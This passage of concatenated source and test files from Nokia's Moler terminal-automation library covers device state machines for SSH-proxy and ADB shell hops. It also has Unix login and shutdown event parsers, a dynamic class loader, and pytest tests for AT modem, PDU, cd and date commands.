UNIX_REMOTE: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_LOCAL_ROOT: UNIX_LOCAL,
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_LOCAL: UNIX_REMOTE,
UNIX_LOCAL_ROOT: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
UNIX_LOCAL: ADB_SHELL,
UNIX_LOCAL_ROOT: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
else:
state_hops = {
NOT_CONNECTED: {
UNIX_REMOTE_ROOT: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
UNIX_REMOTE: {
ADB_SHELL_ROOT: ADB_SHELL,
},
UNIX_REMOTE_ROOT: {
NOT_CONNECTED: UNIX_REMOTE,
ADB_SHELL: UNIX_REMOTE,
ADB_SHELL_ROOT: UNIX_REMOTE,
},
ADB_SHELL: {
NOT_CONNECTED: UNIX_REMOTE,
UNIX_REMOTE_ROOT: UNIX_REMOTE,
},
ADB_SHELL_ROOT: {
NOT_CONNECTED: ADB_SHELL,
UNIX_REMOTE: ADB_SHELL,
UNIX_REMOTE_ROOT: ADB_SHELL,
},
}
return state_hops
def _configure_state_machine(self, sm_params):
"""
Configure device State Machine.
:param sm_params: dict with parameters of state machine for device.
:return: Nothing.
"""
super(AdbRemote2, self)._configure_state_machine(sm_params)
self._update_depending_on_adbshell_prompt()
def _update_depending_on_ux_prompt(self):
self._update_ux_root2ux()
self._update_adbshell2ux()
def _update_depending_on_adbshell_prompt(self):
self._update_adbshellroot2adbshell()
def _update_adbshell2ux(self):
hops_cfg = self._configurations[CONNECTION_HOPS]
if UNIX_REMOTE in self._state_prompts:
ux_remote_prompt = self._state_prompts[UNIX_REMOTE]
hops_cfg[ADB_SHELL][UNIX_REMOTE]["command_params"]["expected_prompt"] = ux_remote_prompt
def _update_adbshellroot2adbshell(self):
hops_cfg = self._configurations[CONNECTION_HOPS]
if ADB_SHELL in self._state_prompts:
adb_shell_prompt = self._state_prompts[ADB_SHELL]
hops_cfg[ADB_SHELL_ROOT][ADB_SHELL]["command_params"]["expected_prompt"] = adb_shell_prompt
cfg_adb2adbroot = hops_cfg[ADB_SHELL][ADB_SHELL_ROOT]
adb_shell_root_prompt = cfg_adb2adbroot["command_params"]["expected_prompt"]
if adb_shell_root_prompt is None:
if adb_shell_prompt.endswith("$"):
adb_shell_root_prompt = adb_shell_prompt[:-1] + "#"
cfg_adb2adbroot["command_params"]["expected_prompt"] = adb_shell_root_prompt
def _get_packages_for_state(self, state, observer):
"""
Get available packages containing cmds and events for each state.
:param state: device state.
:param observer: observer type, available: cmd, events
:return: available cmds or events for specific device state.
"""
available = super(AdbRemote2, self)._get_packages_for_state(state, observer)
if not available:
if (state == ADB_SHELL) or (state == ADB_SHELL_ROOT):
available = {TextualDevice.cmds: ['moler.cmd.unix'],
TextualDevice.events: ['moler.events.shared']}
if available:
return available[observer]
elif state == UNIX_REMOTE: # this is unix extended with adb commands
if observer == TextualDevice.cmds:
available.append('moler.cmd.adb')
return available
```
#### File: moler/device/proxy_pc2.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import six
import abc
import platform
from moler.device.textualdevice import TextualDevice
from moler.device.unixlocal import UnixLocal
try:
from moler.io.raw.terminal import ThreadedTerminal
except ImportError: # ThreadedTerminal won't load on Windows
pass
from moler.events.shared.wait4 import Wait4
# helper variables to improve readability of state machines
# f.ex. moler.device.textualdevice introduces state TextualDevice.not_connected = "NOT_CONNECTED"
NOT_CONNECTED = TextualDevice.not_connected
CONNECTION_HOPS = TextualDevice.connection_hops
UNIX_LOCAL = UnixLocal.unix_local
UNIX_LOCAL_ROOT = UnixLocal.unix_local_root
PROXY_PC = "PROXY_PC"
def want_local_unix_state(io_type=None, io_connection=None):
"""
Check if device is intended to work with local machine or remote ones only.
:return: True for local.
"""
if io_type == "terminal":
return True
if (platform.system() != 'Windows') and isinstance(io_connection, ThreadedTerminal):
return True
else: # all remote-access connections (tcp, udp, telnet, ssh); even connecting to localhost
return False
@six.add_metaclass(abc.ABCMeta)
class ProxyPc2(UnixLocal):
def __init__(self, sm_params, name=None, io_connection=None, io_type=None, variant=None, io_constructor_kwargs=None,
initial_state=None, lazy_cmds_events=False):
"""
Create Unix device communicating over io_connection
:param sm_params: dict with parameters of state machine for device
:param name: name of device
:param io_connection: External-IO connection having embedded moler-connection
:param io_type: type of connection - tcp, udp, ssh, telnet, ...
:param variant: connection implementation variant, ex. 'threaded', 'twisted', 'asyncio', ...
(if not given then default one is taken)
:param io_constructor_kwargs: additional parameter into constructor of selected connection type
(if not given then default one is taken)
:param initial_state: name of initial state. State machine tries to enter this state just after creation.
:param lazy_cmds_events: set False to load all commands and events when device is initialized, set True to load
commands and events when they are required for the first time.
"""
self._use_local_unix_state = want_local_unix_state(io_type, io_connection)
base_state = UNIX_LOCAL if self._use_local_unix_state else NOT_CONNECTED
self._use_proxy_pc = self._should_use_proxy_pc(sm_params, PROXY_PC)
base_or_final_state = PROXY_PC if self._use_proxy_pc else base_state
initial_state = initial_state if initial_state is not None else base_or_final_state
super(ProxyPc2, self).__init__(name=name, io_connection=io_connection,
io_type=io_type, variant=variant,
io_constructor_kwargs=io_constructor_kwargs,
sm_params=sm_params, initial_state=initial_state,
lazy_cmds_events=lazy_cmds_events)
self._prompt_detector_timeout = 0.5
self._after_open_prompt_detector = None
self._warn_about_temporary_life_of_class()
def _warn_about_temporary_life_of_class(self):
what = "experimental/temporary implementation of device utilizing sshshell connection"
temporary_classname = self.__class__.__name__
target_classname = temporary_classname[:-1]
merge_info = "It's functionality will be merged"
future_change = "{} into {} device in Moler 2.0.0 and {} will be removed".format(merge_info,
target_classname,
temporary_classname)
warn_msg = "Class {} is an {}. {}.".format(temporary_classname, what, future_change)
self.logger.warning(warn_msg)
def _should_use_proxy_pc(self, sm_params, proxy):
proxy_in_config = self._is_proxy_pc_in_sm_params(sm_params, proxy)
if (not proxy_in_config) and (not self._use_local_unix_state) and (self.__class__.__name__ == 'ProxyPc2'):
return True # ProxyPc is target of connection open
return proxy_in_config
def goto_state(self, state, *args, **kwargs):
"""Goes to specific state."""
if ((state == UNIX_LOCAL) or (state == UNIX_LOCAL_ROOT)) and (not self._use_local_unix_state):
used_io = "{} {}".format(self.io_connection.__class__.__name__, self.io_connection)
msg = "Device {} has no {}/{} states".format(self, UNIX_LOCAL, UNIX_LOCAL_ROOT)
why = "since it uses following io: {}".format(used_io)
fix = 'You need io of type "terminal" to have unix-local states'
err_msg = "{} {}. {}.".format(msg, why, fix)
raise ValueError(err_msg)
super(ProxyPc2, self).goto_state(state=state, *args, **kwargs)
def _get_default_sm_configuration(self):
"""
Create State Machine default configuration.
:return: default sm configuration.
"""
config = {}
if self._use_local_unix_state:
config = super(ProxyPc2, self)._get_default_sm_configuration()
if self._use_proxy_pc:
default_config = self._get_default_sm_configuration_with_proxy_pc()
else:
default_config = self._get_default_sm_configuration_without_proxy_pc()
self._update_dict(config, default_config)
return config
def _get_default_sm_configuration_with_proxy_pc(self):
"""
Return State Machine default configuration with proxy_pc state.
:return: default sm configuration with proxy_pc state.
"""
if self._use_local_unix_state:
config = {
CONNECTION_HOPS: {
UNIX_LOCAL: { # from
PROXY_PC: { # to
"execute_command": "ssh", # using command
"command_params": { # with parameters
"target_newline": "\n"
},
"required_command_params": [
"host",
"login",
"password",
"expected_prompt"
]
},
},
PROXY_PC: { # from
UNIX_LOCAL: { # to
"execute_command": "exit", # using command
"command_params": { # with parameters
"target_newline": "\n",
"expected_prompt": r'^moler_bash#',
},
"required_command_params": [
]
}
},
}
}
else:
config = {} # no config needed, will open connection to directly jump NOT_CONNECTED -> PROXY_PC
return config
def _get_default_sm_configuration_without_proxy_pc(self):
"""
Return State Machine default configuration without proxy_pc state.
:return: default sm configuration without proxy_pc state.
"""
config = {}
return config
def _prepare_transitions(self):
"""
Prepare transitions to change states.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_transitions()
if self._use_proxy_pc:
transitions = self._prepare_transitions_with_proxy_pc()
else:
transitions = self._prepare_transitions_without_proxy_pc()
self._add_transitions(transitions=transitions)
def _prepare_transitions_with_proxy_pc(self):
"""
Prepare transitions to change states with proxy_pc state.
:return: transitions with proxy_pc state.
"""
if self._use_local_unix_state:
transitions = {
UNIX_LOCAL: {
PROXY_PC: {
"action": [
"_execute_command_to_change_state"
],
}
},
PROXY_PC: {
UNIX_LOCAL: {
"action": [
"_execute_command_to_change_state"
],
},
},
}
else: # directly from NOT_CONNECTED to PROXY_PC
transitions = {
NOT_CONNECTED: {
PROXY_PC: {
"action": [
"_open_connection"
],
}
},
PROXY_PC: {
NOT_CONNECTED: {
"action": [
"_close_connection"
],
},
},
}
return transitions
def _prepare_transitions_without_proxy_pc(self):
"""
Prepare transitions to change states without proxy_pc state.
:return: transitions without proxy_pc state.
"""
transitions = {}
return transitions
def on_connection_made(self, connection):
"""
Execute action when connection made.
:param connection: device connection.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self).on_connection_made(connection)
else:
self._set_state(PROXY_PC)
self._detect_after_open_prompt(self._set_after_open_prompt)
def on_connection_lost(self, connection):
"""
Execute action when connection lost.
:param connection: device connection.
:return: Nothing.
"""
self._set_state(NOT_CONNECTED)
def _detect_after_open_prompt(self, set_callback):
self._after_open_prompt_detector = Wait4(detect_patterns=[r'^(.+)echo DETECTING PROMPT'],
connection=self.io_connection.moler_connection,
till_occurs_times=1)
detector = self._after_open_prompt_detector
detector.add_event_occurred_callback(callback=set_callback,
callback_params={"event": detector})
self.io_connection.moler_connection.sendline("echo DETECTING PROMPT")
self._after_open_prompt_detector.start(timeout=self._prompt_detector_timeout)
def _set_after_open_prompt(self, event):
occurrence = event.get_last_occurrence()
prompt = occurrence['groups'][0]
state = self._get_current_state()
with self._state_prompts_lock:
self._state_prompts[state] = prompt.rstrip()
def _prepare_state_prompts(self):
"""
Prepare textual prompt for each state.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_state_prompts()
if self._use_proxy_pc:
state_prompts = self._prepare_state_prompts_with_proxy_pc()
else:
state_prompts = self._prepare_state_prompts_without_proxy_pc()
self._update_dict(self._state_prompts, state_prompts)
def _prepare_state_prompts_with_proxy_pc(self):
"""
Prepare textual prompt for each state for State Machine with proxy_pc state.
:return: textual prompt for each state with proxy_pc state.
"""
state_prompts = {}
if self._use_local_unix_state:
state_prompts = {
PROXY_PC:
self._configurations[CONNECTION_HOPS][UNIX_LOCAL][PROXY_PC]["command_params"]["expected_prompt"],
UNIX_LOCAL:
self._configurations[CONNECTION_HOPS][PROXY_PC][UNIX_LOCAL]["command_params"]["expected_prompt"],
}
# else detects prompt after establishing connection: _detect_after_open_prompt() & _set_after_open_prompt()
return state_prompts
def _prepare_state_prompts_without_proxy_pc(self):
"""
Prepare textual prompt for each state for State Machine without proxy_pc state.
:return: textual prompt for each state without proxy_pc state.
"""
state_prompts = {}
return state_prompts
def _prepare_newline_chars(self):
"""
Prepare newline char for each state.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_newline_chars()
if self._use_proxy_pc:
newline_chars = self._prepare_newline_chars_with_proxy_pc()
else:
newline_chars = self._prepare_newline_chars_without_proxy_pc()
self._update_dict(self._newline_chars, newline_chars)
def _prepare_newline_chars_with_proxy_pc(self):
"""
Prepare newline char for each state for State Machine with proxy_pc state.
:return: newline char for each state with proxy_pc state.
"""
newline_chars = {}
if self._use_local_unix_state:
newline_chars = {
PROXY_PC:
self._configurations[CONNECTION_HOPS][UNIX_LOCAL][PROXY_PC]["command_params"]["target_newline"],
UNIX_LOCAL:
self._configurations[CONNECTION_HOPS][PROXY_PC][UNIX_LOCAL]["command_params"]["target_newline"],
}
return newline_chars
def _prepare_newline_chars_without_proxy_pc(self):
"""
Prepare newline char for each state for State Machine without proxy_pc state.
:return: newline char for each state without proxy_pc state.
"""
newline_chars = {}
return newline_chars
def _prepare_state_hops(self):
"""
Prepare hops for non direct transitions between states.
:return: Nothing.
"""
if self._use_local_unix_state:
super(ProxyPc2, self)._prepare_state_hops()
if self._use_proxy_pc:
state_hops = self._prepare_state_hops_with_proxy_pc()
else:
state_hops = self._prepare_state_hops_without_proxy_pc()
self._update_dict(self._state_hops, state_hops)
def _prepare_state_hops_with_proxy_pc(self):
"""
Prepare non direct transitions for each state for State Machine with proxy_pc state.
:return: non direct transitions for each state with proxy_pc state.
"""
state_hops = {}
if self._use_local_unix_state:
state_hops = {
NOT_CONNECTED: {
PROXY_PC: UNIX_LOCAL,
},
UNIX_LOCAL_ROOT: {
PROXY_PC: UNIX_LOCAL,
},
PROXY_PC: {
NOT_CONNECTED: UNIX_LOCAL,
UNIX_LOCAL_ROOT: UNIX_LOCAL,
},
}
return state_hops
def _prepare_state_hops_without_proxy_pc(self):
"""
Prepare non direct transitions for each state for State Machine without proxy_pc state.
:return: non direct transitions for each state without proxy_pc state.
"""
state_hops = {}
return state_hops
def _get_packages_for_state(self, state, observer):
"""
Get available packages contain cmds and events for each state.
:param state: device state.
:param observer: observer type, available: cmd, events
:return: available cmds or events for specific device state.
"""
available = []
if self._use_local_unix_state:
available = super(ProxyPc2, self)._get_packages_for_state(state, observer)
if not available:
if state == PROXY_PC:
available = {TextualDevice.cmds: ['moler.cmd.unix'],
TextualDevice.events: ['moler.events.shared', 'moler.events.unix']}
if available:
return available[observer]
return available
```
#### File: events/unix/genericunix_textualevent.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import abc
import six
from moler.events.textualevent import TextualEvent
from moler.helpers import remove_all_known_special_chars
@six.add_metaclass(abc.ABCMeta)
class GenericUnixTextualEvent(TextualEvent):
def _decode_line(self, line):
"""
Decodes line if necessary. Put here code to remove colors from terminal etc.
:param line: line from device to decode.
:return: decoded line.
"""
line = remove_all_known_special_chars(line)
return line
```
#### File: events/unix/last_failed_login.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import datetime
import re
from moler.events.unix.last_login import LastLogin
class LastFailedLogin(LastLogin):
# Last failed login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
_re_last_login = re.compile(r'Last failed login:\s+(?P<DATE>\S.*\S)\s+from\s+(?P<HOST>\S+)', re.I)
def _get_re_line(self):
"""
Returns regex object with groups: DATE and HOST.
:return: regex object with groups: DATE and HOST.
"""
return LastFailedLogin._re_last_login
EVENT_OUTPUT = """
Last failed login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
"""
EVENT_KWARGS = {
"till_occurs_times": 1
}
EVENT_RESULT = [
{
'time': datetime.datetime(2019, 1, 14, 13, 12, 48),
'host': '127.0.0.1',
'date_raw': 'Tue Jun 12 08:54:44 2018',
'date': datetime.datetime(2018, 6, 12, 8, 54, 44),
}
]
```
#### File: events/unix/last_login.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>'
import datetime
import re
from dateutil import parser
from moler.events.unix.genericunix_textualevent import GenericUnixTextualEvent
from moler.exceptions import ParsingDone
class LastLogin(GenericUnixTextualEvent):
def __init__(self, connection, till_occurs_times=-1, runner=None):
"""
Event for 'Last login ... from ...'
:param connection: moler connection to device, terminal when command is executed
:param till_occurs_times: number of event occurrence
:param runner: Runner to run event
"""
super(LastLogin, self).__init__(connection=connection, runner=runner, till_occurs_times=till_occurs_times)
self.current_ret = dict()
self._re_line = self._get_re_line()
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
try:
self._parse_last_login(line=line)
except ParsingDone:
pass
# Last login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
_re_last_login = re.compile(r'Last login:\s+(?P<DATE>\S.*\S)\s+from\s+(?P<HOST>\S+)', re.I)
def _parse_last_login(self, line):
"""
Parses line and tries to find date and host.
:param line: Line from device.
:return: None
:raise: ParsingDone if regex matches the line.
"""
if self._regex_helper.search(self._re_line, line):
self.current_ret["time"] = self._last_recv_time_data_read_from_connection
self.current_ret["host"] = self._regex_helper.group("HOST")
date_str = self._regex_helper.group("DATE")
self.current_ret["date_raw"] = date_str
self.current_ret["date"] = parser.parse(date_str)
self.event_occurred(event_data=self.current_ret)
self.current_ret = dict()
raise ParsingDone()
def _get_re_line(self):
"""
Returns regex object with groups: DATE and HOST.
:return: regex object with groups: DATE and HOST.
"""
return LastLogin._re_last_login
EVENT_OUTPUT = """
Last login: Tue Jun 12 08:54:44 2018 from 127.0.0.1
"""
EVENT_KWARGS = {
"till_occurs_times": 1
}
EVENT_RESULT = [
{
'time': datetime.datetime(2019, 1, 14, 13, 12, 48),
'host': '127.0.0.1',
'date_raw': 'Tue Jun 12 08:54:44 2018',
'date': datetime.datetime(2018, 6, 12, 8, 54, 44),
}
]
```
#### File: events/unix/shutdown.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import datetime
from moler.events.unix.genericunix_lineevent import GenericUnixLineEvent
class Shutdown(GenericUnixLineEvent):
def __init__(self, connection, till_occurs_times=-1, runner=None):
"""
Event detecting system shutdown.
:param connection: moler connection to device, terminal when command is executed
:param till_occurs_times: number of event occurrences
:param runner: Runner to run event
"""
super(Shutdown, self).__init__(connection=connection, runner=runner, till_occurs_times=till_occurs_times,
detect_patterns=[r"system is going down for (\w+) at (.+)"])
EVENT_OUTPUT_SIMPLE = """
The system is going down for reboot at Tue 2019-03-19 12:15:16 CET!
"""
EVENT_KWARGS_SIMPLE = {
"till_occurs_times": 1
}
EVENT_RESULT_SIMPLE = [
{
'line': 'The system is going down for reboot at Tue 2019-03-19 12:15:16 CET!',
"groups": (u'reboot', u'Tue 2019-03-19 12:15:16 CET!'),
"named_groups": {},
"matched": "system is going down for reboot at Tue 2019-03-19 12:15:16 CET!",
'time': datetime.datetime.now()
}
]
```
#### File: moler/moler/instance_loader.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import importlib
# ------------------------------------ public API
def create_instance_from_class_fullname(class_fullname, constructor_parameters):
"""
Factory method that creates class instance object according to its definition given in parameters.
:param class_fullname: full name of class in dotted notation like 'package1.module1.ClassName1'
:param constructor_parameters: to be passed into instance constructor
:return: instance of requested class
"""
class_object = load_class_from_class_fullname(class_fullname)
class_instance = create_class_instance(class_object, constructor_parameters)
return class_instance
def load_class_from_class_fullname(class_fullname):
"""
Factory method that loads class object according to its fullname.
:param class_fullname: full name of class in dotted notation like 'package1.module1.ClassName1'
:return: requested class object
"""
class_module_name, class_name = _split_to_module_and_class_name(class_fullname)
class_object = _load_class(module_name=class_module_name, class_name=class_name)
return class_object
def create_class_instance(class_object, constructor_params):
"""
Factory method that creates class instance object according to its definition given in parameters.
:param class_object: class object to be instantiated
:param constructor_parameters: to be passed into instance constructor
:return: instance of requested class
"""
try:
class_instance = class_object(**constructor_params)
return class_instance
except TypeError as err:
raise TypeError("Creating '%s' instance: %s" % (class_object, str(err)))
# ------------------------------------ implementation
def _split_to_module_and_class_name(class_fullname):
class_split = class_fullname.split('.')
module_list = class_split[0:-1]
module = '.'.join(module_list)
class_name = class_split[-1]
return module, class_name
def _load_class(module_name, class_name):
module = _import_module(module_name)
class_object = _import_class_from_module(module, class_name)
return class_object
def _import_module(module_name):
try:
module_of_class = importlib.import_module(module_name)
return module_of_class
except ImportError as err:
raise ImportError("Could not import '{}' module ({}). Please make sure "
"import path is correct.".format(module_name, str(err)))
def _import_class_from_module(module, class_name):
try:
module_attribute = getattr(module, class_name)
if isinstance(module_attribute, type):
class_object = module_attribute
return class_object
else:
raise TypeError("Module's '%s' attribute '%s' is not class (it is %s)." % (module,
class_name,
type(module_attribute)))
except AttributeError:
raise AttributeError("Module '%s' has no attribute '%s'" % (module, class_name))
```
#### File: cmd/at/test_cmd_at_attach.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
def test_at_cmd_attach_has_default_timeout_180sec(buffer_connection):
from moler.cmd.at import attach
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
assert at_cmd_attach.timeout == 180
def test_calling_at_cmd_attach_timeouts_after_500ms(buffer_connection):
from moler.cmd.at import attach
from moler.exceptions import CommandTimeout
import time
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
buffer_connection.remote_inject_response(["AT+CGATT=1\n"])
start_time = time.time()
with pytest.raises(CommandTimeout):
at_cmd_attach()
duration = time.time() - start_time
assert duration > 0.5
assert duration < 0.7
def test_calling_at_cmd_attach_timeouts_on_no_output(buffer_connection):
from moler.cmd.at import attach
from moler.exceptions import CommandTimeout
import time
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
start_time = time.time()
with pytest.raises(CommandTimeout):
at_cmd_attach()
duration = time.time() - start_time
assert duration > 0.5
assert duration < 0.7
def test_calling_at_cmd_attach_returns_expected_result(buffer_connection):
from moler.cmd.at import attach
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
buffer_connection.remote_inject_response([attach.COMMAND_OUTPUT_ver_execute])
result = at_cmd_attach()
assert result == attach.COMMAND_RESULT_ver_execute
def test_calling_at_cmd_attach_fails_on_erroneous_output(buffer_connection):
from moler.cmd.at import attach
from moler.exceptions import CommandFailure
at_cmd_attach = attach.Attach(connection=buffer_connection.moler_connection,
**attach.COMMAND_KWARGS_ver_execute)
at_cmd_attach.timeout = 0.5
buffer_connection.remote_inject_response(["AT+CGATT=1\nERROR\n"])
with pytest.raises(CommandFailure):
at_cmd_attach()
```
#### File: cmd/at/test_cmd_at_check_attach_state.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
# --------------------------- testing base class ---------------------------
def test_calling_at_cmd_get_attach_state_returns_expected_result(buffer_connection):
from moler.cmd.at import get_attach_state
at_cmd_get_attach_state = get_attach_state.GetAttachState(connection=buffer_connection.moler_connection)
at_cmd_get_attach_state.timeout = 0.5
buffer_connection.remote_inject_response([get_attach_state.COMMAND_OUTPUT_ver_attached])
result = at_cmd_get_attach_state()
assert result == get_attach_state.COMMAND_RESULT_ver_attached
at_cmd_get_attach_state = get_attach_state.GetAttachState(connection=buffer_connection.moler_connection)
at_cmd_get_attach_state.timeout = 0.5
buffer_connection.remote_inject_response([get_attach_state.COMMAND_OUTPUT_ver_detached])
result = at_cmd_get_attach_state()
assert result == get_attach_state.COMMAND_RESULT_ver_detached
def test_calling_at_cmd_get_attach_state_fails_on_erroneous_output(buffer_connection):
from moler.cmd.at import get_attach_state
from moler.exceptions import CommandFailure
at_cmd_get_attach_state = get_attach_state.GetAttachState(connection=buffer_connection.moler_connection)
at_cmd_get_attach_state.timeout = 0.5
buffer_connection.remote_inject_response(["AT+CGATT?\nERROR\n"])
with pytest.raises(CommandFailure):
at_cmd_get_attach_state()
```
#### File: cmd/at/test_cmd_at_get_imsi.py
```python
__author__ = '<NAME>, <NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
def test_calling_at_cmd_get_imsi_returns_expected_result(buffer_connection):
from moler.cmd.at import get_imsi
at_cmd_get_imsi = get_imsi.GetImsi(connection=buffer_connection.moler_connection,
**get_imsi.COMMAND_KWARGS_ver_execute)
buffer_connection.remote_inject_response([get_imsi.COMMAND_OUTPUT_ver_execute])
result = at_cmd_get_imsi()
assert result == get_imsi.COMMAND_RESULT_ver_execute
```
#### File: cmd/at/test_cmd_at_get_manufacturer_id.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
def test_calling_at_cmd_get_manufacturer_id_returns_expected_result(buffer_connection):
from moler.cmd.at import get_manufacturer_id
at_cmd_get_imsi = get_manufacturer_id.GetManufacturerId(connection=buffer_connection.moler_connection)
buffer_connection.remote_inject_response([get_manufacturer_id.COMMAND_OUTPUT_ver_execute])
result = at_cmd_get_imsi()
assert result == get_manufacturer_id.COMMAND_RESULT_ver_execute
```
#### File: cmd/pdu_aten/test_cmd_read_status.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.exceptions import CommandFailure
from moler.cmd.pdu_aten.pdu.read_status import ReadStatus
def test_read_status_command_string(buffer_connection):
expected_command_string = "read status o01 format"
cmd = ReadStatus(connection=buffer_connection.moler_connection, outlet="o01", output_format="format")
assert cmd.command_string == expected_command_string
def test_read_status_failure(buffer_connection, command_output):
buffer_connection.remote_inject_response([command_output])
expected_command_string = "read status o01 wrong_format"
cmd = ReadStatus(connection=buffer_connection.moler_connection, outlet="o01", output_format="wrong_format")
assert cmd.command_string == expected_command_string
with pytest.raises(CommandFailure):
cmd()
@pytest.fixture
def command_output():
data = """read status o01 wrong_format
Invalid command or exceed max command length
>"""
return data
```
#### File: cmd/unix/test_cmd_cd.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>'
import pytest
import datetime
from moler.util.moler_test import MolerTest
from moler.exceptions import CommandFailure
def test_calling_cd_returns_result_parsed_from_command_output(buffer_connection, command_output_and_expected_result):
from moler.cmd.unix.cd import Cd
command_output, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response([command_output])
cd_cmd = Cd(connection=buffer_connection.moler_connection, path="/home/user/")
result = cd_cmd()
assert result == expected_result
def test_cd_returns_proper_command_string(buffer_connection):
from moler.cmd.unix.cd import Cd
cd_cmd = Cd(connection=buffer_connection.moler_connection, path="/home/user/")
assert "cd /home/user/" == cd_cmd.command_string
def test_command_unicode_error(buffer_connection, command_output_and_expected_result):
command_output, expected_result = command_output_and_expected_result
from moler.cmd.unix.cd import Cd
sleep_time = 0.1
class CdUnicodeError(Cd):
def __init__(self, *args, **kwargs):
self.raise_unicode = True
self.nr = 0
super(CdUnicodeError, self).__init__(*args, **kwargs)
def on_new_line(self, line, is_full_line):
if self.raise_unicode:
self.nr += 1
exc = UnicodeDecodeError("utf-8", b'abcdef', 0, 1, "Unknown")
raise exc
super(CdUnicodeError, self).on_new_line(line, is_full_line)
cmd = CdUnicodeError(connection=buffer_connection.moler_connection, path="/home/user/")
cmd_start_string = "{}\n".format(cmd.command_string)
cmd.start()
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(cmd_start_string.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd._ignore_unicode_errors = False
cmd.raise_unicode = True
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received("abc".encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd.raise_unicode = False
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(command_output.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
with pytest.raises(CommandFailure):
cmd.await_done()
cmd = CdUnicodeError(connection=buffer_connection.moler_connection, path="/home/user/")
cmd.start()
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(cmd_start_string.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd._ignore_unicode_errors = True
cmd.raise_unicode = True
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received("abc".encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd.raise_unicode = False
MolerTest.sleep(sleep_time)
buffer_connection.moler_connection.data_received(command_output.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
cmd.await_done()
@pytest.fixture
def command_output_and_expected_result():
data = """
host:~ # cd /home/user/
host:/home/user #
"""
result = {
}
return data, result
```
#### File: cmd/unix/test_cmd_date.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import pytest
def test_calling_date_returns_result_parsed_from_command_output(buffer_connection, command_output_and_expected_result):
from moler.cmd.unix.date import Date
command_output, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response([command_output])
date_cmd = Date(connection=buffer_connection.moler_connection)
result = date_cmd()
assert result == expected_result
@pytest.fixture
def command_output_and_expected_result():
data = """
user@host:~> date '+DATE:%t%t%d-%m-%Y%nTIME:%t%t%H:%M:%S%nZONE:%t%t%z %Z%nEPOCH:%t%t%s%nWEEK_NUMBER:%t%-V%nDAY_OF_YEAR:%t%-j%nDAY_OF_WEEK:%t%u (%A)%nMONTH:%t%t%-m (%B)'
DATE: 14-03-2018
